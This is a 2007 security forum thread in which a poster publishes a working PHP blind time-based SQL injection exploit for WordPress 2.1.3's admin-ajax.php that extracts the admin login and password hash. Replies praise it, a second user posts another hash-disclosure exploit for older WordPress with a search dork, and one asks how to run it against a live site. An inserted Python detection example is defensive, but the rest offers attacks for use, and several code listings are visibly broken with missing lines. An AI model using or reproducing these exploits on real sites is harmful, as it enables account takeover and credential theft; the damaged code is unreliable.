IT Security and Insecurity Portal
WordPress 2.1.3 sql injection blind fishing exploit ver. 2
Posted: Wed May 23, 2007 12:25 pm
waraxe
Site admin

Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
So this is the new version of the WordPress 2.1.3 sql injection blind fishing exploit. This time it can steal from the target database not only the md5 hash, but the user login too.
To use this exploit you need:
1. a working PHP installation
2. to run this script as PHP CLI
3. to modify the needed parameters at the beginning of the script
Code:
$norm_delay = 0;
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// original version released - 21. may 2007
// added login retrieving - 23. may 2007
$outfile = './warlog.txt';// Log file
$url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php';
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
$get_hash = true;// md5 hash retrieving - true or false
$get_login = true;// user login retrieving - true or false
echo "\n\nWordPress 2.1.3 blind sql injection exploit by waraxe \n\n";
echo "Target: $url\n";
echo "sql table prefix: $prefix\n";
$suffix = md5(substr($url, 0, strlen($url) - 24));
echo "cookie suffix: $suffix\n";
echo "testing probe delays \n";
$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds\n";
echo "trying to get md5 hash from target \n";
$hash = get_hash();
echo "trying to get user login from target \n";
$login = get_login();
add_line("Target: $url");
add_line("User ID: $id");
add_line("Login: $login");
add_line("Hash: $hash");
echo "\nWork finished\n";
echo "Questions and feedback - http://www.waraxe.us/ \n";
die("See ya! :) \n");
function get_login()
$field = 'user_login';
$out = '';
echo "first we need user login length ... \n";
$len = get_length($field, 60);
echo "user login length is $len chars\n";
echo "finding user login now ...\n";
for($i = 1; $i < $len + 1; $i ++)
$ch = get_anychar($field,$i);
echo "got $field pos $i --> $ch\n";
$out .= "$ch";
echo "current value for $field: $out \n";
echo "\nFinal result: $field=$out\n\n";
return $out;
function get_length($field, $maxlen = 60)
global $prefix, $suffix, $id, $testcnt;
$len = 0;
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH($field)%s,BENCHMARK($cnt,MD5(1337)),3)/*";
$min = 0;
$max = $maxlen;
echo "starting $field length retrieve\n";
$curr = 0;
$area = $max - $min;
if($area < 2 )
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);
$len = $max;
$len = $min;
$half = intval(floor($area / 2));
$curr = $min + $half;
$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$bigger = test_condition($post);
$min = $curr;
$max = $curr;
echo "curr: $curr--$max--$min\n";
return $len;
function get_hash()
$len = 32;
$field = 'user_pass';
$out = '';
echo "finding hash now ...\n";
for($i = 1; $i < $len + 1; $i ++)
$ch = get_hashchar($field,$i);
echo "got $field pos $i --> $ch\n";
$out .= "$ch";
echo "current value for $field: $out \n";
echo "\nFinal result: $field=$out\n\n";
return $out;
function get_anychar($field,$pos)
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";
$min = 32;
$max = 255;
$curr = 0;
$area = $max - $min;
if($area < 2 )
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);
$char = chr($max);
$char = chr($min);
$half = intval(floor($area / 2));
$curr = $min + $half;
$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$bigger = test_condition($post);
$min = $curr;
$max = $curr;
echo "curr: $curr--$max--$min\n";
return $char;
function get_hashchar($field,$pos)
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";
// First let's determine, if it's number or letter
$inj = sprintf($ipattern, $prefix, $id, ">57");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post);
$min = 97;
$max = 102;
echo "char to find is [a-f]\n";
$min = 48;
$max = 57;
echo "char to find is [0-9]\n";
$curr = 0;
$area = $max - $min;
if($area < 2 )
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);
$char = chr($max);
$char = chr($min);
$half = intval(floor($area / 2));
$curr = $min + $half;
$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$bigger = test_condition($post);
$min = $curr;
$max = $curr;
echo "curr: $curr--$max--$min\n";
return $char;
function test_condition($p)
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();
if($buff === '-1')
echo "test_condition() - try $try - invalid return value ...\n";
$try ++;
if($try > $maxtry)
die("too many tries - exiting ...\n");
echo "trying again - try $try ...\n";
$diff = $end - $start;
$delay = intval($diff * 10);
if($delay > ($norm_delay * 2))
$bret = true;
return $bret;
function get_normdelay($testcnt)
$fa = test_md5delay(1);
echo "$fa\n";
$sa = test_md5delay($testcnt);
echo "$sa\n";
$fb = test_md5delay(1);
echo "$fb\n";
$sb = test_md5delay($testcnt);
echo "$sb\n";
$fc = test_md5delay(1);
echo "$fc\n";
$sc = test_md5delay($testcnt);
echo "$sc\n";
$mean_nondelayed = intval(($fa + $fb + $fc) / 3);
echo "mean nondelayed - $mean_nondelayed dsecs\n";
$mean_delayed = intval(($sa + $sb + $sc) / 3);
echo "mean delayed - $mean_delayed dsecs\n";
return $mean_delayed;
function test_md5delay($cnt)
global $url, $id, $prefix, $suffix;
// delay in deciseconds
$delay = -1;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();
if(intval($buff) !== -1)
die("test_md5delay($cnt) - invalid return value, exiting ...");
$diff = $end - $start;
$delay = intval($diff * 10);
return $delay;
function getmicrotime()
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
curl_setopt ($ch, CURLOPT_REFERER, $referer);
if($headers === TRUE)
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
$fc = curl_exec($ch);
return $fc;
function add_line($buf)
global $outfile;
$buf .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $buf);
Feedback is welcome!
Enjoy
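A defender-side counterpart to the technique in this post, added here as an example (it is not waraxe's code and not part of WordPress). The exploit above carries its injection in the `cookie` POST parameter of admin-ajax.php, with the quote double-encoded as `%2527`, and reads the answer from response time: it calibrates a normal delay and treats anything over twice that as a true condition, using a BENCHMARK() of `$testcnt * 4` (1,200,000 with the default 300000). The code below does two things from the other side of that exchange: it decodes the pseudo-cookie parameter fully and flags a field whose value has a quote followed by UNION, BENCHMARK or SLEEP, and it flags clients whose response times to one URL split into a fast cluster and a slow cluster, which is the shape a timing oracle produces. The cookie suffix, client addresses and timings are constructed sample values, and the 2.0 slow-factor mirrors the exploit's own threshold.

```python
"""Detection helpers for the admin-ajax.php blind SQL injection pattern in the post.
Added example; not the forum's, waraxe's or WordPress's own code."""
import re
from urllib.parse import unquote

# Quote followed later by an SQL marker is what the post's payload looks like once decoded.
SQLI_MARKERS = re.compile(r"\b(UNION\s+(ALL\s+)?SELECT|BENCHMARK\s*\(|SLEEP\s*\()", re.IGNORECASE)

# Constructed placeholder for the md5-derived cookie suffix the exploit computes from the URL.
SUFFIX = "0" * 32

# Constructed request values built from the post's sprintf patterns (raw POST parameter values).
ATTACK_PARAM = (
    f"wordpressuser_{SUFFIX}%3dxyz%2527 UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 "
    "FROM wp_users WHERE ID=1 AND IF(LENGTH(user_pass)>31,BENCHMARK(1200000,MD5(1337)),3)/*; "
    f"wordpresspass_{SUFFIX}%3dp0hh"
)
BENIGN_PARAM = f"wordpressuser_{SUFFIX}%3dadmin; wordpresspass_{SUFFIX}%3d{'deadbeef' * 4}"


def full_unquote(value: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly until stable, so %2527 -> %27 -> ' is seen as a quote."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_pseudo_cookie(param: str) -> dict:
    """Split the decoded 'name=value; name2=value2' string the endpoint accepts as a cookie."""
    fields = {}
    for part in full_unquote(param).split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")  # first '=' only; payload itself contains 'ID=1'
        fields[name.strip()] = value
    return fields


def inspect_cookie_param(param: str) -> list:
    """Return the pseudo-cookie field names whose value breaks out with a quote and carries SQL."""
    return [
        name
        for name, value in parse_pseudo_cookie(param).items()
        if "'" in value and SQLI_MARKERS.search(value)
    ]


def timing_oracle_clients(records, slow_factor: float = 2.0, min_each: int = 8) -> list:
    """Flag (client, path) pairs whose response times form a fast cluster plus a slow cluster.

    records: iterable of (client_ip, path, seconds). The lower quartile is taken as the fast
    baseline; a request slower than slow_factor * baseline counts as 'delayed'. A client with
    at least min_each requests in both clusters is the bimodal shape a blind timing oracle leaves.
    """
    by_client = {}
    for ip, path, seconds in records:
        by_client.setdefault((ip, path), []).append(seconds)
    flagged = []
    for key, times in by_client.items():
        if len(times) < 2 * min_each:
            continue
        baseline = sorted(times)[len(times) // 4]
        slow = [t for t in times if t > slow_factor * baseline]
        if len(slow) >= min_each and len(times) - len(slow) >= min_each:
            flagged.append(key)
    return flagged


def constructed_records() -> list:
    """Constructed timing records: one ordinary visitor and one client driving a timing oracle."""
    path = "/wp-admin/admin-ajax.php"
    visitor = [("203.0.113.7", path, 0.05 + (i % 5) * 0.01) for i in range(30)]
    # alternating 'condition false' (no BENCHMARK) and 'condition true' (BENCHMARK ran) responses
    oracle = [("198.51.100.9", path, 0.06 if i % 2 else 0.95) for i in range(30)]
    return visitor + oracle


if __name__ == "__main__":
    print("attack param flags:", inspect_cookie_param(ATTACK_PARAM))
    print("benign param flags:", inspect_cookie_param(BENIGN_PARAM))
    print("timing-oracle clients:", timing_oracle_clients(constructed_records()))
```

Because the payload travels in the POST body and not in a real Cookie header, ordinary access logs never contain it; the decoder belongs in a request-inspection hook (a WAF rule or application middleware that sees the parsed POST parameters), while the timing check needs a log format that records response time, such as Apache's `%D` or nginx's `$request_time`.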
Posted: Sun May 27, 2007 2:53 pm
pexli
Valuable expert

Joined: May 24, 2007
Posts: 665
Location: Bulgaria
Working great. Thank you.
Posted: Mon May 28, 2007 9:31 am
zoiz
Beginner

Joined: Mar 23, 2007
Posts: 4
thanks..nice xD~ works for me.
Posted: Wed May 30, 2007 12:54 pm
barr0w
Regular user

Joined: May 30, 2007
Posts: 13
Yesterday I built a LAMP box with PHP/CURL just to try this exploit out. It works PERFECTLY. I just wanted to say great work and thank you. Now if I was just more skilled at md5 hacking I'd be all set hahahah.
Posted: Wed May 30, 2007 2:13 pm
waraxe
Site admin

Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
It's nice to hear positive feedback
Posted: Wed May 30, 2007 4:08 pm
pexli
Valuable expert

Joined: May 24, 2007
Posts: 665
Location: Bulgaria
In Estonia, it seems, people know how to speak Russian. Or maybe I'm wrong.
You wrote everything very well and it works great. Well done.
Posted: Fri Jun 01, 2007 12:10 am
waraxe
Site admin

Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
koko wrote:
In Estonia, it seems, people know how to speak Russian. Or maybe I'm wrong.
You wrote everything very well and it works great. Well done.

Thanks for the feedback. Good to hear that the script works as expected.
As for Russian: I really do know it to some extent
Posted: Fri Jun 01, 2007 5:51 am
pexli
Valuable expert

Joined: May 24, 2007
Posts: 665
Location: Bulgaria
Working people working scripts
And I see you write well in Russian too. Well done.
Posted: Sat Jun 02, 2007 12:01 am
mimic
Beginner

Joined: Jun 02, 2007
Posts: 2
The 2.2 version is also affected?
Posted: Sat Jun 02, 2007 1:14 am
waraxe
Site admin

Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
mimic wrote:
The 2.2 version is also affected?

Nope, 2.2 is immune
Posted: Sat Jun 02, 2007 9:44 am
scoobydoo
Regular user

Joined: Jun 02, 2007
Posts: 5
this exploit works in all < 2.1.3 versions?
Posted: Sat Jun 02, 2007 1:28 pm
pexli
Valuable expert

Joined: May 24, 2007
Posts: 665
Location: Bulgaria
No. In old versions the file admin-ajax.php is missing.
For old versions try this exploit.
Code:
<?php
Wordpress <= 2.0.6 wp-trackback.php Zend_Hash_Del_Key_Or_Index /
/ sql injection admin hash disclosure exploit
(needs register_globals=on, 4 <= PHP < 4.4.3,< 5.1.4)
by rgod
dork: "is proudly powered by WordPress"
mail: retrog at alice dot it
site: http://retrogod.altervista.org
if ($argc<3) {
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to wordpress
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
-t[prefix]: specify a table prefix (default: wp_)
php '.$argv[0].' localhost /wordpress/ -P1.1.1.1:80
php '.$argv[0].' localhost / -p81
function quick_dump($string)
for ($i=0; $i<=strlen($string)-1; $i++)
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
return $exa."\r\n".$result;
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
if (!$ock) {
echo 'No response from proxy...';die;
if ($proxy=='') {
while (!feof($ock)) {
else {
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
for ($i=3; $i<$argc; $i++){
if ($temp=="-p")
if ($temp=="-P")
if ($temp=="-t")
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
function my_encode($my_string)
for ($k=0; $k<=strlen($my_string)-1; $k++)
if ($k==strlen($my_string)-1) {$encoded.=")";}
else {$encoded.=",";}
return $encoded;
echo "\npwd hash -> ";
while (!strstr($password,chr(0)))
for ($i=0; $i<=255; $i++)
if (in_array($i,$chars))
$data ="-----------------------------7d61bcd1f033e\r\n";
$data.="Content-Disposition: form-data; name=\"title\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"url\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"blog_name\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"tb_id\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"1740009377\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"496546471\";\r\n\r\n";
$packet ="POST ".$p."wp-trackback.php?tb_id=1 HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
if (!eregi("trackbacks are closed",$html)) {$password.=chr($i);echo chr($i);sleep(1);break;}
if ($i==255) {
die("\nExploit failed...");
echo "\n";
echo "admin user -> ";
while (!strstr($admin,chr(0)))
for ($i=0; $i<=255; $i++)
$data ="-----------------------------7d61bcd1f033e\r\n";
$data.="Content-Disposition: form-data; name=\"title\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"url\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"blog_name\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"tb_id\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"1740009377\";\r\n\r\n";
$data.="Content-Disposition: form-data; name=\"496546471\";\r\n\r\n";
$packet ="POST ".$p."wp-trackback.php?tb_id=1 HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
if (!eregi("trackbacks are closed",$html)) {$admin.=chr($i);echo chr($i);sleep(1);break;}
if ($i==255) {
die("\nExploit failed...");
echo "\n";
function is_hash($hash)
if (ereg("([a-f0-9]{32})",trim($hash))) {return true;}
else {return false;}
if (is_hash($password)) {
echo "exploit succeeded...";
else {
echo "exploit failed...";
# milw0rm.com [2007-01-10]
Posted: Sat Jun 02, 2007 5:45 pm
scoobydoo
Regular user

Joined: Jun 02, 2007
Posts: 5
Hello koko, thanks... but how do I actually use this? Does this script require SSH? And it does not have a place to specify the host, etc. etc. like waraxe pasted above... can you please paste another version of the same script where I can specify what to test, or can you tell me an example? Like what to change in the script? Say I want to test it with example.com ...
Posted: Sat Jun 02, 2007 5:50 pm
pexli
Valuable expert

Joined: May 24, 2007
Posts: 665
Location: Bulgaria
Install php on your PC and run the script. Easy.
Posted: Sat Jun 02, 2007 6:11 pm
scoobydoo
Regular user

Joined: Jun 02, 2007
Posts: 5
I want to test it on a live WordPress site, and when I run that script it says error